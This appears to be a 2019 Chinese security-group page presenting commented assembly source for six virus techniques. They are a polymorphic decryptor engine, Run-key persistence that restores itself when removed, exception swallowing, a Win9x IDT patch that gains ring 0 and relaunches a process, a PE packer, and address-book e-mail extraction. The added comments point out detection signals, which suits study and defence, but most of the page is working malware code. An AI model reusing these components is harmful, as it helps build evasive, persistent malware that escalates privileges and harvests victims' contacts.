
        病毒源碼解析之防御分析

        2019-09-06 23:33:18
        1、超級病毒變形引擎

        此段代碼會在DATA段內生成一個解密代碼。

        ;-----------------------------------------------------------------------
        ; Listing 1: decryptor-stub generator (TASM syntax, flat model, STDCALL;
        ; "call proc,args" is TASM's extended call, arguments pushed right to left).
        ; Data layout below: DeCode is a small executable stub that lives in
        ; the writable .data section; Encode is a 100h-byte area of 0cch (int 3)
        ; bytes that @@Start overwrites with a freshly assembled decryption
        ; loop.  Executable code in a writable data section is by itself a
        ; useful detection signal (W^X violation).
        ;-----------------------------------------------------------------------
        .586p
        .model flat,STDCALL
        extrn ExitProcess: proc          ; declared but not called anywhere in this listing
        VirusSize=100h                   ; byte count the step-1 snippets load into the loop counter
        .data

        DecodeMethod dd ?                ; low bit of RndCode at the moment the step-2 snippet was chosen (see @@Start)
        DeCode:                          ; entry of the generated stub (reached by "jmp DeCode" in @@Start)
        pushad
        call Encode                      ; pushes the address of the 11h block; the step-0 snippet reads it from [esp]
        db 100h dup(11h)                 ; 100h-byte placeholder block that the generated loop transforms in place
        Encode:                          ; the generated loop is written here by @@Start; 0cch = int 3 until then
        db 100h dup(0cch)
        RndReg0 dd 0 ;eax -- index 0..3 (eax,ebx,ecx,edx) of the pointer register
        RndReg1 dd 0 ;ebx -- index 0..3 of the counter register, chosen so it differs from RndReg0
        RndCode dd 0 ;Rnd Code -- working value, rotated one bit before each snippet selection
        RndMima dd 60932561 ;Rnd Password -- seed; also patched into the step-2 snippet as its 32-bit operand

        .code
        ;-----------------------------------------------------------------------
        ; @@Start: assembles a decryption loop into the Encode area, then runs it.
        ; Register roles while filling: edi = write cursor inside Encode,
        ; esi = source snippet returned by GetBxCode, ebx = address of the
        ; loop body start (target of the backward jump), al = last byte copied.
        ; Every snippet in GetBxCode's table ends with a 0cch byte; each copy
        ; loop stops after copying that byte and then backs edi up by one so the
        ; delimiter is overwritten by the next snippet.
        ; Emitted stub = step0 (pointer = [esp]) ; step1 (counter = VirusSize) ;
        ; step2 (xor/add dword [pointer], key) ; step3 (pointer += 4) ;
        ; step4 (counter -= 4) ; step5 (jcc back to step2) ; ret.
        ; Because the bytes change with the seed, detection keys on the
        ; generator's structure (0cch-delimited table, call/pop address fetch,
        ; writable code area), not on the emitted stub.
        ;-----------------------------------------------------------------------
        @@Start:
        mov eax,RndMima
        ror eax,7
        mov RndCode,eax                  ; RndCode = ror(RndMima,7)

        mov eax,RndCode
        mov ecx,eax
        and eax,011b                     ; pointer register index = RndCode & 3
        mov RndReg0,eax
        xor ecx,RndMima
        and ecx,011b                     ; counter register candidate = (RndCode ^ RndMima) & 3
        cmp eax,ecx
        jnz short ChooseRegOk
        inc ecx                          ; same register twice: move to the next index (mod 4)
        and ecx,011b
        ChooseRegOk:
        mov RndReg1,ecx


        mov edi,offset Encode            ; output cursor

        ror RndCode,1                    ; one fresh bit per step chooses between the two variants
        call GetBxCode,0,RndReg0,RndCode ; step 0: load the pointer register from [esp]
        mov esi,eax
        ContFillStep0:
        cld
        lodsb
        stosb
        cmp al,0cch                      ; delimiter copied -> snippet complete
        jnz ContFillStep0
        dec edi                          ; back up over the copied delimiter

        ror RndCode,1
        call GetBxCode,1,RndReg1,RndCode ; step 1: load the counter register with VirusSize
        mov esi,eax
        ContFillStep1:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep1
        dec edi

        mov ebx,edi ;// start of the loop body (step 2); used below to compute the jmp displacement

        ror RndCode,1
        call GetBxCode,2,RndReg0,RndCode ; step 2: xor (bit 0 = 0) or add (bit 0 = 1) dword [pointer], imm32
        mov esi,eax
        ContFillStep2:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep2
        dec edi

        mov eax,RndMima
        mov [edi-4],eax ;// patch the key: the last 4 bytes of the step-2 snippet are its imm32 (12345678h placeholder)
        mov eax,RndCode
        and eax,01
        mov DecodeMethod,eax ;// record the DeCode method: the same RndCode bit that chose xor (0) or add (1) above

        ror RndCode,1
        call GetBxCode,3,RndReg0,RndCode ; step 3: pointer += 4
        mov esi,eax
        ContFillStep3:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep3
        dec edi

        ror RndCode,1
        call GetBxCode,4,RndReg1,RndCode ; step 4: counter -= 4
        mov esi,eax
        ContFillStep4:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep4
        dec edi

        ror RndCode,1
        call GetBxCode,5,RndReg0,RndCode ; step 5: 2-byte conditional jump; its rel8 is patched below
        mov esi,eax
        ContFillStep5:
        cld
        lodsb
        stosb
        cmp al,0cch
        jnz ContFillStep5
        dec edi

        mov al,0c3h
        mov [edi],al ;// terminate with ret: it pops the address pushed by "call Encode" and runs the transformed block

        sub ebx,edi
        mov [edi-1],bl ;// rel8 of the step-5 jcc = target (ebx) - address of the following ret (edi)

        int 3; debugger break before the generated stub is executed

        jmp DeCode                       ; pushad / call Encode / generated loop / ret into the transformed block
        ret                              ; not reached on the path above as far as this listing shows
        ;-----------------------------------------------------------------------
        ; GetBxCode(Step, Reg, Rnd) -> eax = address of one code snippet.
        ; Snippet table: for each step 0..5 and each register 0..3
        ; (eax,ebx,ecx,edx) there are two variants meant to be equivalent, each
        ; terminated by a 0cch byte (the "int 3" lines are the delimiters, not
        ; executed code).  Index = (Step*4 + Reg)*2 + (Rnd & 1); GetBxCodeAddr
        ; counts that many delimiters from the table start, so no snippet byte
        ; may itself be 0cch.
        ; Steps: 0 pointer = [esp]; 1 counter = VirusSize; 2 xor/add dword
        ; [pointer], imm32 (patched by the caller); 3 pointer += 4;
        ; 4 counter -= 4; 5 jcc with rel8 "$" (patched by the caller).
        ; The caller uses RndReg0 for steps 0,2,3,5 and RndReg1 for steps 1,4.
        ; "uses ebx ecx edx esi edi": TASM pushes these in the prologue and a
        ; bare "ret" inside the proc expands to the matching epilogue.
        ; Note the "Setp2_*" labels are spelled that way in the original.
        ;-----------------------------------------------------------------------
        GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
        call GetBxCodeAddr               ; pushes the address of Step0_Eax (table start) and jumps to the lookup below
        Step0_Eax:                       ; step 0: pointer = [esp]
        mov eax,[esp]
        int 3;
        pop eax
        push eax
        int 3;
        Step0_Ebx:
        pop ebx
        push ebx
        int 3;
        push dword ptr[esp]
        pop ebx
        int 3;
        Step0_Ecx:
        mov ecx,[esp]
        int 3;
        pop ecx
        push ecx
        int 3;
        Step0_Edx:
        mov edx,[esp]
        int 3;
        mov edx,esp
        mov edx,[edx]
        int 3

        Step1_Eax:                       ; step 1: counter = VirusSize, written in obfuscated forms
        mov eax,VirusSize
        int 3
        sub eax,eax
        add ax,VirusSize+3081h
        sub ax,3081h
        int 3
        Step1_Ebx:
        mov ebx,VirusSize
        int 3;
        xor ebx,ebx
        or bx,VirusSize
        int 3;
        Step1_Ecx:
        sub ecx,ecx
        xor ecx,(VirusSize xor 3181h)
        xor ecx,(3181h)
        int 3;
        mov ecx,0
        and cx,VirusSize
        int 3
        Step1_Edx:
        and edx,0
        xor dx,(VirusSize-0281h)
        add dx,0281h
        int 3;
        xor edx,edx
        sub edx,(0181h-VirusSize)
        sub edx,-0181h
        int 3;

        Setp2_Eax:                       ; step 2: variant 0 = xor, variant 1 = add; the imm32 is a placeholder
        xor [eax],12345678h
        int 3
        add [eax],12345678h
        int 3
        Setp2_Ebx:
        xor [ebx],12345678h
        int 3;
        add [ebx],12345678h
        int 3;

        Setp2_Ecx:
        xor [ecx],12345678h
        int 3;
        add [ecx],12345678h
        int 3;
        Setp2_Edx:
        xor [edx],12345678h
        int 3;
        add [edx],12345678h
        int 3;
        Step3_Eax:                       ; step 3: pointer += 4
        add eax,4
        int 3
        inc eax
        inc eax
        inc eax
        inc eax
        int 3;
        Step3_Ebx:
        add ebx,5
        dec ebx
        int 3
        add ebx,2
        add ebx,2
        int 3;
        Step3_Ecx:
        sub ecx,-4
        int 3
        sub ecx,-5
        dec ecx
        int 3;
        Step3_Edx:
        inc edx
        sub edx,-3
        int 3
        add edx,04
        int 3;

        Step4_Eax:                       ; step 4: counter -= 4
        sub eax,4
        int 3
        dec eax
        dec eax
        dec eax
        sub eax,1
        int 3;
        Step4_Ebx:
        dec ebx
        sub ebx,3
        int 3;
        dec ebx
        dec ebx
        sub ebx,2
        int 3;
        Step4_Ecx:                       ; 16-bit forms on cx
        add cx,123
        sub cx,123+4
        int 3
        sub cx,-4
        dec cx
        sub cx,7
        int 3
        Step4_Edx:
        sub dx,2
        dec dx
        sub dx,1
        int 3
        inc edx
        sub dx,5
        int 3;
        Step5_Eax:                       ; step 5: 2-byte jcc; "$" gives a rel8 the caller overwrites
        jnz $
        int 3
        ja $
        int 3
        Step5_Ebx:
        jg $
        int 3
        jnb $
        int 3
        Step5_Ecx:
        jnl $
        int 3
        jnz $
        int 3
        Step5_Edx:
        ja $
        int 3
        jg $
        int 3

        GetBxCodeAddr:
        pop esi                          ; esi = table start (return address of the call at the top)
        mov al,0cch ;// instruction separator
        mov ecx,Step
        shl ecx,1
        shl ecx,1                        ; ecx = Step*4
        add ecx,Reg ;// index of the (step,reg) pair
        shl ecx,1                        ; two variants per pair
        and Rnd,01b                      ; only the low bit of Rnd matters (modifies the stack copy of the argument)
        add ecx,Rnd                      ; ecx = number of delimiters to skip
        jcxz short GetBxCodeOver         ; index 0: the first snippet starts at the table itself
        ContFindCode:
        push ecx
        ContFindCC:
        inc esi
        cmp [esi],al                     ; byte compare (al is 8-bit)
        jnz ContFindCC
        pop ecx
        loop ContFindCode                ; esi now at the ecx-th delimiter
        mov eax,esi
        inc eax                          ; snippet begins right after it
        ret                              ; TASM expands this to the proc epilogue
        GetBxCodeOver:
        mov eax,esi
        ret
        GetBxCode endp


        end @@Start


        2、Windows 9x/2000/xp 鎖定注冊表

        .586p
        .model flat,STDCALL
        .data

        ;-----------------------------------------------------------------------
        ; Listing 2: autorun persistence through a Run value, plus a watcher
        ; thread that rewrites the value whenever the key changes.
        ; NOTE(review): the path separators in HKeyStr appear to have been
        ; stripped by the page extraction; 080000002h, the root handle used
        ; with it below, is HKEY_LOCAL_MACHINE.
        ;-----------------------------------------------------------------------
        HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0   ; subkey opened under HKLM
        ValueName db 'wap32',0           ; value written under that key
        PathName db 'wap32.exe',0        ; value data (but note the 100h length passed to RegSetValueExA)

        .code

        extrn RegOpenKeyA: proc
        extrn RegSetValueExA: proc
        extrn RegCloseKey: proc
        extrn ExitProcess: proc
        extrn RegNotifyChangeKeyValue: proc
        extrn CreateThread: proc
        extrn Sleep: proc
        extrn RegQueryValueExA: proc

        ;-----------------------------------------------------------------------
        ; start: opens the Run subkey under HKLM, writes ValueName = PathName,
        ; starts RegProtectProc on the same key handle, sleeps 3 minutes and
        ; returns.  No return value of the registry calls is checked.
        ; Register roles: ebx = hKey.  Stack slots are reserved with push and
        ; their address passed as esp (TASM pushes the rightmost argument first).
        ;-----------------------------------------------------------------------
        start:
        push eax                         ; slot that receives phkResult
        call RegOpenKeyA,080000002h,offset HKeyStr,esp   ; RegOpenKeyA(HKEY_LOCAL_MACHINE, HKeyStr, &slot)
        pop ebx                          ; ebx = key handle; the result code in eax is not examined
        call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h   ; type 1 = REG_SZ; cbData = 100h, so 256 bytes are stored although PathName is 10 bytes -- whatever follows it in .data lands in the registry value

        sub esp,100h                     ; 256-byte stack buffer for the value data
        mov eax,esp
        push 100h                        ; cbData (in/out)
        call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp   ; read the value back; lpType = 0
        pop eax                          ; returned size; not used afterwards (the slot pushed next is overwritten by CreateThread)
        add esp,100h                     ; buffer discarded

        push eax                         ; slot for lpThreadId
        call CreateThread,0,0,offset RegProtectProc,ebx,0,esp   ; watcher thread, parameter = hKey
        pop eax
        call Sleep,1000*60*3             ; 3 minutes
        ret                              ; returns from the entry point; ExitProcess is declared but never called

        ;-----------------------------------------------------------------------
        ; RegProtectProc(hKey): thread body.  Reads the current 'wap32' value
        ; data into a 256-byte stack buffer, then loops forever: block in
        ; RegNotifyChangeKeyValue (filter 4 = REG_NOTIFY_CHANGE_LAST_SET, no
        ; subtree, synchronous) and write the saved data back as REG_SZ.
        ; Effect: deleting or editing the Run value is undone as soon as the
        ; key changes, so remediation has to stop this thread/process first;
        ; monitoring shows a RegSetValueEx on the key right after every change.
        ; Register roles: ebx = hKey, edi = buffer, esi = inline value name
        ; (embedded after a call and fetched with pop).  The loop never
        ; exits, so the endp epilogue is never reached.
        ;-----------------------------------------------------------------------
        RegProtectProc proc hKey:dword
        mov ebx,hKey
        sub esp,100h                     ; 256-byte buffer for the value data
        mov edi,esp
        call GetProtectKeyName           ; pushes the address of the string below
        db 'wap32',0
        GetProtectKeyName:
        pop esi                          ; esi -> 'wap32'
        push 100h                        ; cbData
        call RegQueryValueExA,ebx,esi,0,0,edi,esp
        pop eax
        WaitRegChangeNotify:
        call RegNotifyChangeKeyValue,ebx,0,4,0,0   ; returns when a value under hKey is set
        call RegSetValueExA,ebx,esi,0,01,edi,100h  ; write the saved 256 bytes back
        jmp short WaitRegChangeNotify
        RegProtectProc endp

        end start



        3、 Windows 9x/2000 意外處理通用程序


        此段程序可以達到屏蔽程序錯誤的效果

        include wap32.inc

        .386p
        .model flat,stdcall

        extrn MessageBoxA: proc
        extrn ExitProcess: proc

        .data

        Msg db 'Fuck',0                  ; text and caption for the MessageBoxA call in Start

        ;-----------------------------------------------------------------------
        ; Listing 3: a hand-built "swallow any exception and continue" frame
        ; on the SEH chain (fs:[0]).  Everything from here through GetEspAddr
        ; is emitted after the .data directive (the .code directive only comes
        ; later), so the handler runs from a writable section; SafeSEH/DEP-era
        ; systems would presumably reject a handler placed this way -- not
        ; demonstrated here.  D and cx_Eip are assumed to be defined by
        ; wap32.inc (a dword ptr equate and the CONTEXT Eip field) -- TODO confirm.
        ;
        ; SetSehFrame: caller sets ecx = address to resume at after a fault.
        ; On return the caller's stack carries a 4-dword frame (top first):
        ;   [saved slot value][previous fs:[0]][handler address][resume address]
        ; fs:[0] points at the {previous, handler} pair, and the esp at that
        ; time is stored in GetEspAddr's slot for ClearSehFrame to unwind to.
        ;-----------------------------------------------------------------------
        SetSehFrame: ; ecx = address at which execution continues after an ignored error
        pop eax ; pop the return address
        push ecx ; save the resume address
        call PushExceptionProc           ; pushes the address of the jmp below, i.e. the handler entry
        jmp short Exception
        PushExceptionProc:
        push fs:dword ptr[0]             ; previous registration; with the handler address above this forms {prev, handler}
        mov fs:[0],esp                   ; install the registration
        call GetEspAddr                  ; edx -> storage slot
        push D [edx] ; save the slot's old value
        mov [edx],esp                    ; slot = esp to unwind to
        jmp eax                          ; back to the caller, frame left on its stack
        ClearSehFrame:
        pop eax ; pop the return address
        call GetEspAddr
        mov esp,[edx]                    ; drop anything pushed since SetSehFrame
        pop D [edx] ; restore the slot's old value
        pop fs:dword ptr[0]              ; restore the previous handler
        pop ecx                          ; discard the handler address
        pop ecx ; ecx = resume address
        jmp eax

        ;-----------------------------------------------------------------------
        ; Exception: the SEH handler.  It points the faulting context's Eip at
        ; the "call ClearSehFrame" line below and returns 0
        ; (ExceptionContinueExecution).  When the OS resumes the thread there,
        ; the frame is torn down and control jumps to the resume address that
        ; ClearSehFrame leaves in ecx.  The redirect target's address is
        ; obtained with the call/pop idiom (PushSehBackProc).
        ;-----------------------------------------------------------------------
        Exception proc pRecord,pFrame,pContext,pDispatch
        call PushSehBackProc             ; pushes the address of the next line
        call ClearSehFrame               ; execution resumes here after the handler returns
        jmp ecx                          ; ecx = resume address set by ClearSehFrame
        PushSehBackProc:
        pop ecx                          ; ecx = address of "call ClearSehFrame"
        mov eax,pContext
        mov [eax.cx_Eip],ecx             ; redirect the faulting thread there (cx_Eip assumed to be CONTEXT.Eip)
        xor eax,eax ; 0 = ExceptionContinueExecution: ignore the error and continue
        ret                              ; inside a proc with arguments TASM expands this to the epilogue, so this returns to the dispatcher
        Exception endp

        ;-----------------------------------------------------------------------
        ; GetEspAddr: returns edx = address of the dd slot below, in which
        ; SetSehFrame stores the esp that ClearSehFrame unwinds to.
        ;-----------------------------------------------------------------------
        GetEspAddr:
        call PushOffsetEspAddr           ; pushes the address of the slot
        dd ?                             ; saved esp
        PushOffsetEspAddr:
        pop edx
        ret


        .code

        ;-----------------------------------------------------------------------
        ; Start: demonstrates the frame.  PushErrorProc installs it with the
        ; instruction after "call PushErrorProc" as the resume point, then
        ; deliberately writes to address 0.  The access violation is caught,
        ; the frame is unwound and execution continues at the MessageBoxA call.
        ; Crash suppression of this kind hides faults from the user and from
        ; crash-reporting, which is why the page presents it as "masking errors".
        ;-----------------------------------------------------------------------
        Start:
        call PushErrorProc               ; pushes the address of the MessageBoxA line = resume point
        call MessageBoxA,0,offset Msg,offset Msg,0
        ret
        PushErrorProc:
        pop ecx                          ; ecx = resume address
        call SetSehFrame
        mov ds:[0],eax                   ; deliberate access violation: write to address 0
        call ClearSehFrame               ; not reached when the write above faults
        ret


        end Start



        4、Windows 9x 下進程不死術

        此段程序首先實現Win9x下注射遠程線程(新技術)
        然后與Win2k下進程不死術一樣了。
        include Win32.inc

        .386p
        .model flat,stdcall

        extrn GetProcAddress: proc
        extrn WinExec: proc
        extrn MessageBoxA: proc
        extrn Sleep: proc
        extrn GetCurrentProcessId: proc
        extrn OpenProcess: proc
        extrn GetCurrentProcess: proc
        extrn WriteProcessMemory: proc
        extrn GetExitCodeProcess: proc

        .data

        ;Problem: Sleep() has to be used here so that Kernel32 gets a chance to update its data
        ;-----------------------------------------------------------------------
        ; Listing 4: Win9x "undying process".  KnlThread is written to be
        ; relocatable: each kernel32 function pointer sits inline right after
        ; a call and is fetched with pop, so the bytes keep working when copied
        ; elsewhere.  It is emitted after the .data directive (writable
        ; section) and is meant to run as a thread created outside this
        ; process: open the given process, wait until it terminates, then
        ; WinExec the file named at FileName.  The three pointer slots are
        ; filled by Start via GetProcAddress.  PROCESS_ALL_ACCESS and FALSE
        ; come from Win32.inc.
        ;-----------------------------------------------------------------------
        KnlThread proc ProcID:dword
        call GetKnlOpenProcess           ; pushes the address of the slot below
        KnlOpenProcess dd ?              ; &OpenProcess, stored by Start
        GetKnlOpenProcess:
        pop eax
        call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID   ; OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcID)
        or eax,eax
        jz short ExitProtectProc         ; could not open the process -> give up
        mov ebx,eax                      ; ebx = process handle
        call GetKnlWaitForSingleObject
        KnlWaitForSingleObject dd ?      ; &WaitForSingleObject, stored by Start
        GetKnlWaitForSingleObject:
        pop eax
        call [eax],ebx,-1h               ; timeout -1 = INFINITE: block until the process ends
        call GetFileNameAddress
        GetFileNameAddress:
        pop ecx                          ; ecx = run-time address of this label
        add ecx,offset FileName-offset GetFileNameAddress   ; relative fixup; assumes FileName was copied along at the same distance
        call GetKnlWinExec
        KnlWinExec dd ?                  ; &WinExec, stored by Start
        GetKnlWinExec:
        pop eax
        call [eax],ecx,01                ; WinExec(FileName, 1 = SW_SHOWNORMAL): relaunch the program
        ExitProtectProc:
        ret
        KnlThread endp

        FileName db 'c:wap32.exe',0      ; program to relaunch; the path separator appears to have been lost in extraction

        ; Export names resolved by Start from the image at 0bff70000h (used as kernel32's base).
        KnlOpenProcessStr db 'OpenProcess',0
        KnlWaitForObjectStr db 'WaitForSingleObject',0
        KnlWinExecStr db 'WinExec',0
        KnlSleepStr db 'Sleep',0         ; declared; neither resolved nor used in this listing
        KnlCreateKnlThreadStr db 'CreateKernelThread',0   ; not a documented Win32 API; used to start a thread outside this process

        .code

        ;-----------------------------------------------------------------------
        ; Start: resolves OpenProcess/WaitForSingleObject/WinExec by name from
        ; the image at 0bff70000h (passed to GetProcAddress as the module
        ; handle, i.e. treated as kernel32's base), stores them in KnlThread's
        ; inline slots, copies 100h bytes into that image at +600h through
        ; MoveDataToKnl (a ring-0 write, see below) and then asks
        ; CreateKernelThread to run the copied code with the current PID as
        ; parameter.  The copy source passed is offset Start.  The observable
        ; side effect is a write into the shared kernel32 image, which is what
        ; a system-integrity check would catch.
        ; Register roles: ebx = CreateKernelThread.
        ;-----------------------------------------------------------------------
        Start:
        call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
        mov KnlOpenProcess,eax           ; patch the slot inside KnlThread
        call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
        mov KnlWaitForSingleObject,eax
        call GetProcAddress,0bff70000h,offset KnlWinExecStr
        mov KnlWinExec,eax

        call MoveDataToKnl,offset Start,0bff70600h,100h   ; Src = Start, Des = 0bff70600h, 100h bytes

        call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
        mov ebx,eax
        call GetCurrentProcessId
        push eax                         ; slot for the thread id (initially holds the pid)
        call ebx,0,0,0bff70000h+600h,eax,0,esp   ; CreateKernelThread(0,0,start=0bff70600h,param=pid,0,&id); argument order assumed to mirror CreateThread -- confirm
        pop eax
        call MessageBoxA,0,offset FileName,offset FileName,0
        ret

        ;-----------------------------------------------------------------------
        ; MoveDataToKnl(Src, Des, nCx): copies nCx bytes from Src to Des while
        ; executing at ring 0.  Mechanism: read the IDT base with sidt, save
        ; the 8-byte descriptor of vector 3, overwrite only its offset fields
        ; (bytes 0-1 and 6-7, so selector and type stay as they were) with the
        ; address of the pushad below, and execute int 3; the "handler"
        ; restores the descriptor, does rep movsb and iret's back.
        ; This relies on the IDT being writable from user mode, which held on
        ; Win9x; on NT-family kernels the descriptor write would presumably
        ; fault.  Patching IDT entries from user mode is the classic signal
        ; for this class of privilege escalation.
        ; W is assumed to be a word ptr equate from Win32.inc -- TODO confirm.
        ; Register roles: eax = &IDT[3], ebx:edx = saved descriptor.
        ;-----------------------------------------------------------------------
        MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
        push eax
        sidt [esp-2]                     ; 6-byte IDTR image: limit at [esp-2], base at [esp]
        pop eax                          ; eax = IDT base
        add eax,3*8                      ; descriptor of vector 3 (int 3)
        mov ebx,[eax]                    ; save the original descriptor
        mov edx,[eax+4]
        call SetIdt03                    ; pushes the address of the pushad below
        pushad                           ; --- reached through the patched gate, i.e. at ring 0 ---
        mov [eax],ebx                    ; restore the original descriptor first
        mov [eax+4],edx
        cld
        rep movsb                        ; the privileged copy
        popad
        iret                             ; back to the instruction after int 3
        SetIdt03:
        cli
        pop W[eax]                       ; low word of the pushed address -> offset bits 15:0
        pop W[eax+6]                     ; high word -> offset bits 31:16
        mov esi,Src
        mov edi,Des
        mov ecx,nCx
        int 3; enters the patched gate
        sti
        ret                              ; TASM expands this to the proc epilogue
        MoveDataToKnl endp

        end Start


        5、簡單算法,高效率壓縮PE文件

        .586p
        .model flat,STDCALL
        .data

        OldFile db 'pe.exe',0            ; input file
        NewFile db 'pe.zzz',0            ; output file

        FileData db 0,0                  ; 2-byte I/O scratch: [0] = byte just read, [1] = run length when a 00 nn pair is written
        .code
        extrn _lopen: proc,_lcreat: proc
        extrn _lread: proc,_lwrite: proc
        extrn _lclose: proc
        extrn ExitProcess: proc
        ;-----------------------------------------------------------------------
        ; Listing 5: byte-at-a-time run-length encoding of zero bytes.
        ; Output format: a non-zero byte is copied literally; a run of 1..255
        ; zero bytes becomes the pair 00 nn (nn = run length); longer runs are
        ; split.  Register roles: esi = input handle, edi = output handle,
        ; ebx = length of the current zero run, al = byte read.
        ; _lread returns the byte count (0 at end of file); only zero is
        ; tested, so an error return is not distinguished from data.
        ;-----------------------------------------------------------------------
        start:
        call _lopen,offset OldFile,0
        cmp eax,-1                       ; HFILE_ERROR
        jz ExitProc
        mov esi,eax
        call _lcreat,offset NewFile,0
        cmp eax,-1
        jz CloseOldFile
        mov edi,eax

        xor ebx,ebx                      ; zero-run length = 0
        ReadData:
        call _lread,esi,offset FileData,1
        or eax,eax
        jz short ReadOver                ; 0 bytes read = end of file
        movzx eax,FileData
        or eax,eax
        jnz short NoZero
        inc ebx                          ; one more zero
        cmp ebx,0ffh
        jnz short ReadData
        xor eax,eax                      ; run reached 255: emit 00 FF now
        mov ah,bl
        xchg ax,word ptr FileData        ; FileData = 00,count (its first byte was the zero just read)
        call _lwrite,edi,offset FileData,2
        xor ebx,ebx
        jmp short ReadData
        NoZero:
        or ebx,ebx
        jnz short NoZeroData             ; a pending zero run has to be flushed first
        call _lwrite,edi,offset FileData,1   ; literal byte
        jmp short ReadData
        NoZeroData:
        push eax                         ; keep the literal byte across the call
        xor eax,eax
        mov ah,bl
        mov word ptr FileData,ax         ; 00,count
        call _lwrite,edi,offset FileData,2
        xor ebx,ebx
        pop eax
        mov FileData,al                  ; then the literal byte itself
        call _lwrite,edi,offset FileData,1
        jmp ReadData
        ReadOver:
        or ebx,ebx
        jz short CloseFile
        xor eax,eax                      ; flush a trailing zero run
        mov ah,bl
        xchg ax,word ptr FileData
        call _lwrite,edi,offset FileData,2
        xor ebx,ebx
        CloseFile:
        call _lclose,edi
        CloseOldFile:
        call _lclose,esi
        ExitProc:
        call ExitProcess,0

        end start

        6、提取Windows地址薄文件(*.WAB)的Email信息

        .586p
        .model flat,STDCALL
        .data

        MailFile db 'My.WAB',0           ; Windows Address Book file read by start

        .code

        extrn _lopen: proc,_lcreat: proc
        extrn _lread: proc,_lwrite: proc
        extrn _llseek: proc
        extrn _lclose: proc
        extrn MessageBoxA: proc
        extrn ExitProcess: proc
        extrn WideCharToMultiByte: proc

        ;-----------------------------------------------------------------------
        ; Listing 6: reads a Windows Address Book (.WAB) file and shows each
        ; Unicode e-mail name in a message box.  Header layout relied on (per
        ; the original comments; not defined in this listing): dword at +60h =
        ; file offset of the name table, dword at +64h = number of entries,
        ; one entry = 44h bytes of UTF-16.  Register roles: ebx = file handle,
        ; edi = 256-byte stack buffer (header, then each record), ecx = entries left.
        ; Address-book enumeration by an unexpected process is a classic
        ; mass-mailer indicator; file-access auditing on *.WAB surfaces it.
        ;-----------------------------------------------------------------------
        start:
        call _lopen,offset MailFile,0
        cmp eax,-1                       ; HFILE_ERROR
        jz short ExitProc
        mov ebx,eax
        sub esp,100h
        mov edi,esp                      ; edi = 256-byte buffer
        call _lread,ebx,edi,100h         ; header
        cmp eax,100h
        jnz short CloseFile              ; short read -> stop
        mov eax,[edi+60h] ; offset of the Unicode e-mail name table
        call _llseek,ebx,eax,0           ; 0 = seek from file start
        mov ecx,[edi+64h] ; number of Unicode e-mail names
        ContWabMail:
        push ecx                         ; ecx is not preserved across the calls below
        call _lread,ebx,edi,44h ; read one record
        cmp eax,44                       ; decimal 44 rather than 44h, and the flags are overwritten by the sub below before any branch
        sub esp,100h                     ; conversion buffer
        mov eax,esp
        call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0   ; code page 0 = CP_ACP, flags 200h, length -1 = NUL-terminated source
        mov eax,esp
        call MessageBoxA,0,eax,eax,0
        add esp,100h
        pop ecx
        loop short ContWabMail
        CloseFile:
        call _lclose,ebx
        ExitProc:
        call ExitProcess,0

        end start



        WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
        WSS 主頁:http://www.whitecell.org/
        WSS 論壇:http://www.whitecell.org/forum/
